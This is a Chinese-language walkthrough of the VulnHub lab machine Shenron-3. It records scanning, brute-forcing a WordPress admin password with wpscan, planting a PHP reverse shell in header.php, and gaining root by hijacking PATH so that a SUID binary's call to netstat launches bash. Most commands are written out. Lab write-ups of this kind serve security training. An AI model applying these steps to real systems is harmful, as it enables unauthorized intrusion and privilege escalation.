下载链接:https://www.vulnhub.com/entry/shenron-3,682/
需要拿到两面flag
信息收集
nmap扫描
nmap -sC -sV 192.168.210.209
只有一个80端口
网站信息收集
看来得添加hosts解析,跟同系列靶机一个套路
页面正常
发现cms还是wordpress
目录扫描
dirb http://shenron
找到个后台登录页面
wordpress漏洞利用
wpscan扫描
wpscan --url http://shenron/ --enumerate u
发现用户名为admin
爆破后台密码
wpscan --url [http://shenron](http://shenron) --usernames admin --passwords tools/z字典/wordlist.txt
这里用了自己的字典 ,用/usr/share/wordlists/rockyou.txt 也可就是时间长一点
iloverockyou
登录后台
getshell
找到header.php,插入php反弹链接木马
kali使用nc监听端口,刷新页面成功getshell
python调一个交互bash
python3 -c 'import pty; pty.spawn("/bin/bash");'
提权
cat /etc/passwd
发现一个shenron用户
试了试刚才爆出的后台密码发现直接登录shenron
发现flag1
执行了network发现实际上执行的就是network,并且他有suid权限,所属者为root
修改环境变量
进入tmp下 创建一个netstat文件 写入/bin/bash,并赋予执行权限,那么只要执行了我们创建的netstat就可以调一个bash。
接下来赋予环境变量叫bash到当前tmp目录寻找命令,那么找到的netstat就会变成我们创建的netstat。又因为shenron家目录下的network有suid权限所属者是root,所以实际上会用root调bash。
echo /bin/bash > netstat
export PATH=/tmp:$PATH
echo $PATH
执行家目录下的network
root家目录下发现flag2,通关!